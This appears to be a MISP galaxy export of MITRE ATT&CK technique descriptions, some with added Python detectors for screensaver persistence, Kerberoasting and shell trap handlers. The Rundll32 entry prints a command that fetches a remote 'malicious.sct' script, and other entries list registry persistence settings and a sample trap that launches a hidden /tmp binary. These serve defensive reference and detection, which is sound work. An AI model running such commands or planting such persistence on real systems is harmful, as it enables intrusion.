Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in <code>C:\Windows\System32\</code>, and <code>C:\Windows\sysWOW64\</code> on 64-bit Windows systems, along with screensavers included with base Windows installations.

The following screensaver settings are stored in the Registry (<code>HKCU\Control Panel\Desktop\</code>) and could be manipulated to achieve persistence:

  • <code>SCRNSAVE.exe</code> - set to malicious PE path

  • <code>ScreenSaveActive</code> - set to '1' to enable the screensaver

  • <code>ScreenSaverIsSecure</code> - set to '0' to not require a password to unlock

  • <code>ScreenSaveTimeout</code> - sets user inactivity timeout before screensaver is executed

Adversaries can use these screensaver settings to maintain persistence by configuring the screensaver to run malware after a set period of user inactivity.(Citation: ESET Gazer Aug 2017)
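One way a defender can check the four settings listed above, as an added example that is not part of the MISP or ATT&CK entry: it parses a constructed .reg export of HKCU\Control Panel\Desktop (rather than a live registry, so it runs anywhere) and flags a screensaver binary outside the Windows directories, an active but non-locking screensaver, and a very short timeout; the sample export and the 300-second threshold are assumptions.

```python
"""Audit exported screensaver settings for T1546.002 persistence indicators.

Added example: works on a constructed .reg export of the
HKCU\\Control Panel\\Desktop key instead of querying a live registry.
"""
import re

# Constructed .reg export (not captured from a real host). The SCRNSAVE.EXE
# value points into a user profile, which is the main red flag.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Control Panel\Desktop]
"SCRNSAVE.EXE"="C:\\Users\\alice\\AppData\\Roaming\\update.scr"
"ScreenSaveActive"="1"
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="60"
"""

# Directories where the stock Windows screensavers live (from the entry above).
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

_VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<value>.*)"$')


def parse_desktop_values(reg_text: str) -> dict:
    """Return the REG_SZ values under Control Panel\\Desktop, keyed by
    lower-cased value name. .reg files escape backslashes as '\\\\',
    which is undone here."""
    values = {}
    in_key = False
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_key = line.lower() == r"[hkey_current_user\control panel\desktop]"
            continue
        if not in_key:
            continue
        m = _VALUE_RE.match(line)
        if m:
            values[m.group("name").lower()] = m.group("value").replace("\\\\", "\\")
    return values


def assess_screensaver(values: dict) -> list:
    """Return a list of findings (empty means nothing suspicious).

    Mirrors the four settings listed for T1546.002: the screensaver binary
    path, whether it is active, whether unlocking needs a password, and how
    quickly it fires. Value names are compared case-insensitively because
    Windows itself writes ScreenSaveTimeOut with a capital O.
    """
    findings = []
    path = values.get("scrnsave.exe", "")
    if path:
        low = path.lower()
        if not low.endswith(".scr"):
            findings.append(f"screensaver is not a .scr file: {path}")
        if not low.startswith(TRUSTED_DIRS):
            findings.append(f"screensaver outside Windows directories: {path}")
    if values.get("screensaveactive") == "1" and values.get("screensaverissecure") == "0":
        findings.append("screensaver active but does not lock the session")
    try:
        timeout = int(values.get("screensavetimeout", "0"))
    except ValueError:
        timeout = 0
    if 0 < timeout < 300:  # assumed threshold; tune to the environment's policy
        findings.append(f"unusually short inactivity timeout: {timeout}s")
    return findings


if __name__ == "__main__":
    for finding in assess_screensaver(parse_desktop_values(SAMPLE_REG_EXPORT)):
        print("FINDING:", finding)
```

On a real host, feed the output of `reg export "HKCU\Control Panel\Desktop" desktop.reg` to parse_desktop_values.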

The tag is: misp-galaxy:mitre-attack-pattern="Screensaver - T1546.002"

Table 6385. Table References

Links

https://attack.mitre.org/techniques/T1546/002

https://en.wikipedia.org/wiki/Screensaver

https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf

WHOIS - T1596.002

Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)

Adversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="WHOIS - T1596.002"

Table 6386. Table References

Links

https://attack.mitre.org/techniques/T1596/002

https://www.whois.net/

Tool - T1588.002

Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) was not intended for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)

Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).

The tag is: misp-galaxy:mitre-attack-pattern="Tool - T1588.002"

Table 6387. Table References

Links

https://attack.mitre.org/techniques/T1588/002

https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/

https://www.recordedfuture.com/identifying-cobalt-strike-servers/

Server - T1583.004

Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Adversaries may use web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.

Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)

The tag is: misp-galaxy:mitre-attack-pattern="Server - T1583.004"

Table 6388. Table References

Links

https://attack.mitre.org/techniques/T1583/004

https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2

https://threatconnect.com/blog/infrastructure-research-hunting/

https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation

https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html

Botnet - T1583.005

Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)

The tag is: misp-galaxy:mitre-attack-pattern="Botnet - T1583.005"

Table 6389. Table References

Links

https://attack.mitre.org/techniques/T1583/005

https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/

https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/

https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/

https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html

https://www.imperva.com/learn/ddos/booters-stressers-ddosers/

Kerberoasting - T1558.003

Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015)

Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016)

Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)

This same behavior could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)

Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)
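Detection logic for the behaviour described above, as an added example that is not part of the MISP or ATT&CK entry: it scans Windows Security event 4769 (Kerberos service ticket requested) records for one requester pulling RC4 (etype 0x17) tickets for many distinct SPNs in a short window. The EventData field names are the real 4769 ones; the `time` key, the sample records, and the 5-minute/3-SPN thresholds are assumptions.

```python
"""Flag Kerberoasting-style TGS requests in Windows Security event 4769.

Added example, not part of the MISP/ATT&CK entry. Works on constructed
event records; TargetUserName, ServiceName, TicketEncryptionType and
IpAddress are the real 4769 EventData names, "time" is a constructed key.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # etype 23, the RC4 ticket encryption the entry describes

# Constructed sample, not real telemetry. One account requests RC4 tickets
# for four SPNs within seconds; the other requests are ordinary AES tickets.
SAMPLE_EVENTS = [
    {"time": "2024-03-01T09:00:01", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.25"},
    {"time": "2024-03-01T09:00:02", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.25"},
    {"time": "2024-03-01T09:00:03", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.25"},
    {"time": "2024-03-01T09:00:04", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_sccm", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.25"},
    {"time": "2024-03-01T09:05:00", "TargetUserName": "asmith@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.40"},
    {"time": "2024-03-01T09:06:00", "TargetUserName": "WS01$@CORP.LOCAL",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.41"},
]


def is_service_account(service_name: str) -> bool:
    """Exclude computer accounts (trailing $) and krbtgt: only user-type
    service accounts have human-chosen passwords that crack offline."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def find_kerberoast_candidates(events, window=timedelta(minutes=5), min_spns=3):
    """Return {requester: sorted SPNs} for requesters that obtained RC4 (0x17)
    service tickets for at least `min_spns` distinct SPNs within `window`.

    A single RC4 ticket is not conclusive (legacy accounts may still be
    RC4-only); the burst of distinct SPNs is what separates roasting from
    normal service use, so baseline the thresholds per environment.
    """
    by_user = defaultdict(list)
    for ev in events:
        if ev["TicketEncryptionType"].lower() != RC4_HMAC:
            continue
        if not is_service_account(ev["ServiceName"]):
            continue
        by_user[ev["TargetUserName"]].append(
            (datetime.fromisoformat(ev["time"]), ev["ServiceName"]))

    hits = {}
    for user, reqs in by_user.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):  # sliding window over time-ordered requests
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            if len({name for _, name in reqs[start:end + 1]}) >= min_spns:
                hits[user] = sorted({name for _, name in reqs})
                break
    return hits


if __name__ == "__main__":
    for user, spns in find_kerberoast_candidates(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting by {user}: {', '.join(spns)}")
```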

The tag is: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003"

Table 6390. Table References

Links

https://adsecurity.org/?p=2293

https://attack.mitre.org/techniques/T1558/003

https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/

https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1

https://msdn.microsoft.com/library/ms677949.aspx

https://redsiege.com/kerberoast-slides

https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx

https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/

Serverless - T1583.007

Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.

Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)

The tag is: misp-galaxy:mitre-attack-pattern="Serverless - T1583.007"

Table 6391. Table References

Links

https://attack.mitre.org/techniques/T1583/007

https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/

https://blog.xpnsec.com/aws-lambda-redirector/

https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/

Malvertising - T1583.008

Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements.(Citation: spamhaus-malvertising) Purchased ads may also target specific audiences using the advertising network’s capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites.

Adversaries may purchase ads and other resources to help distribute artifacts containing malicious code to victims. Purchased ads may attempt to impersonate or spoof well-known brands. For example, these spoofed ads may trick victims into clicking the ad, which could then send them to a malicious domain that may be a clone of official websites containing trojanized versions of the advertised software.(Citation: Masquerads-Guardio)(Citation: FBI-search) Adversaries' efforts to create malicious domains and purchase advertisements may also be automated at scale to better resist cleanup efforts.(Citation: sentinelone-malvertising)

Malvertising may be used to support [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), potentially requiring limited interaction from the user if the ad contains code/exploits that infect the target system’s web browser.(Citation: BBC-malvertising)

Adversaries may also employ several techniques to evade detection by the advertising network. For example, adversaries may dynamically route ad clicks to send automated crawler/policy enforcer traffic to benign sites while validating potential targets then sending victims referred from real ad clicks to malicious pages. This infection vector may therefore remain hidden from the ad network as well as any visitor not reaching the malicious sites with a valid identifier from clicking on the advertisement.(Citation: Masquerads-Guardio) Other tricks, such as intentional typos to avoid brand reputation monitoring, may also be used to evade automated detection.(Citation: spamhaus-malvertising)

The tag is: misp-galaxy:mitre-attack-pattern="Malvertising - T1583.008"

Table 6392. Table References

Links

https://attack.mitre.org/techniques/T1583/008

https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e

https://www.bbc.com/news/technology-12891182

https://www.ic3.gov/Media/Y2022/PSA221221

https://www.sentinelone.com/blog/breaking-down-the-seo-poisoning-attack-how-attackers-are-hijacking-search-results/

https://www.spamhaus.com/resource-center/a-surge-of-malvertising-across-google-ads-is-distributing-dangerous-malware/

Server - T1584.004

Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.

Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations.

The tag is: misp-galaxy:mitre-attack-pattern="Server - T1584.004"

Table 6393. Table References

Links

https://attack.mitre.org/techniques/T1584/004

https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2

https://threatconnect.com/blog/infrastructure-research-hunting/

https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation

Trap - T1546.005

Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.

Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format <code>trap 'command list' signals</code> where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)
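An audit that lists the trap handlers registered in shell startup files, as an added example that is not part of the MISP or ATT&CK entry: it parses the <code>trap 'command list' signals</code> form described above and flags handlers that background a process or run something from a scratch directory. The sample rc-file content and the list of scratch directories are assumptions.

```python
"""Find trap handlers registered in shell startup files (T1546.005).

Added example, not from the entry. Parses constructed rc-file content
inline; feed it the text of ~/.bashrc, ~/.profile or /etc/profile.d/*
to audit a real host.
"""
import shlex

# Constructed sample startup file (not from a real host).
SAMPLE_RC = r"""
# normal: clean up a temp file on exit
trap 'rm -f "$TMPFILE"' EXIT
export PATH="$HOME/bin:$PATH"
# suspicious: re-launch a hidden binary whenever ctrl+c or a shell exit occurs
trap '/tmp/.cache/agent >/dev/null 2>&1 &' INT EXIT
trap - TERM
"""

# Assumed scratch directories that legitimate cleanup handlers rarely execute from.
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def parse_traps(rc_text: str) -> list:
    """Return [(command_list, [signals, ...])] for every trap statement.

    shlex keeps a quoted 'command list' with spaces as one argument, which
    matches the trap 'command list' signals form.
    """
    traps = []
    for raw in rc_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            words = shlex.split(line, comments=True)
        except ValueError:
            continue  # unbalanced quotes: not a well-formed statement
        if len(words) < 2 or words[0] != "trap":
            continue
        traps.append((words[1], words[2:]))
    return traps


def suspicious_traps(rc_text: str) -> list:
    """Handlers that background a process or execute from a scratch
    directory, i.e. behave like persistence rather than cleanup."""
    hits = []
    for cmd, signals in parse_traps(rc_text):
        if cmd == "-":
            continue  # 'trap - SIG' resets the handler to its default
        backgrounded = cmd.rstrip().endswith("&")
        scratch = any(d in cmd for d in SUSPICIOUS_DIRS)
        if backgrounded or scratch:
            hits.append((cmd, signals))
    return hits


if __name__ == "__main__":
    for cmd, signals in suspicious_traps(SAMPLE_RC):
        print(f"suspicious trap on {' '.join(signals)}: {cmd}")
```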

The tag is: misp-galaxy:mitre-attack-pattern="Trap - T1546.005"

Table 6394. Table References

Links

https://attack.mitre.org/techniques/T1546/005

https://bash.cyberciti.biz/guide/Trap_statement

https://ss64.com/bash/trap.html

Botnet - T1584.005

Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.(Citation: Imperva DDoS for Hire) Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).

The tag is: misp-galaxy:mitre-attack-pattern="Botnet - T1584.005"

Table 6395. Table References

Links

https://attack.mitre.org/techniques/T1584/005

https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html

https://www.imperva.com/learn/ddos/booters-stressers-ddosers/

https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation

CDNs - T1596.004

Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.

Adversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)).

The tag is: misp-galaxy:mitre-attack-pattern="CDNs - T1596.004"

Table 6396. Table References

Links

https://attack.mitre.org/techniques/T1596/004

https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/

Exploits - T1587.004

Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)

As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary’s exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.

Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).

The tag is: misp-galaxy:mitre-attack-pattern="Exploits - T1587.004"

Table 6397. Table References

Links

https://attack.mitre.org/techniques/T1587/004

https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims

https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html

Serverless - T1584.007

Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.

Once compromised, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)

The tag is: misp-galaxy:mitre-attack-pattern="Serverless - T1584.007"

Table 6398. Table References

Links

https://attack.mitre.org/techniques/T1584/007

https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/

https://blog.xpnsec.com/aws-lambda-redirector/

https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/

Exploits - T1588.005

Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)

In addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)

An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.

Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).

The tag is: misp-galaxy:mitre-attack-pattern="Exploits - T1588.005"

Table 6399. Table References

Links

https://attack.mitre.org/techniques/T1588/005

https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/

https://www.exploit-db.com/

https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html

https://www.vice.com/en/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec

https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage

Vulnerabilities - T1588.006

Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)

An adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).

The tag is: misp-galaxy:mitre-attack-pattern="Vulnerabilities - T1588.006"

Table 6400. Table References

Links

https://attack.mitre.org/techniques/T1588/006

https://nvd.nist.gov/

Rundll32 - T1218.011

Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, rather than executing a DLL directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that do not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).

Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)

Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending <code>W</code> and/or <code>A</code> to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: <code>rundll32.exe file.dll,#1</code>).

Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion)

The tag is: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011"

Table 6401. Table References

Links

https://attack.mitre.org/techniques/T1218/011

https://github.com/gtworek/PSBits/tree/master/NoRunDll

https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/

https://www.attackify.com/blog/rundll32_execution_order/

https://www.cynet.com/attack-techniques-hands-on/defense-evasion-techniques/

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
